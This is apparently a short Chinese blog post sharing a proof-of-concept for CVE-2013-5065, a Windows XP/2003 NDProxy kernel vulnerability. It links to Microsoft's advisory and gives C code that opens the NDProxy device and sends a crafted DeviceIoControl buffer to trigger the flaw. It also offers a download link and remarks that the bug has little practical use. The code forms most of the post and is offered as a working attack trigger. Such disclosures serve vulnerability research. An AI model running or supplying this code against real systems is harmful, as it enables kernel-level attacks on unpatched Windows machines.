CVE-2013-5065 PoC

这个是有07大牛带出来的poc
微软安全公告: http://technet.microsoft.com/zh-cn/security/advisory/2914486
受影响系统: XP, 2003
PoC:
[php]
#include
#include
int main()
{
HANDLE hDev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDev==INVALID_HANDLE_VALUE)
{
printf("CreateFile Error:%d\n",GetLastError());
}
DWORD InBuf[0x15] = {0};
DWORD dwRetBytes = 0;
*(InBuf+5) = 0x7030125;
*(InBuf+7) = 0x34;

DeviceIoControl(hDev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, &dwRetBytes, 0);
CloseHandle(hDev);

return 0;
}[/php]
v5
华丽丽的表示鸡肋了,一般谁会开启这个服务啊

下载地址:点我下载

发表评论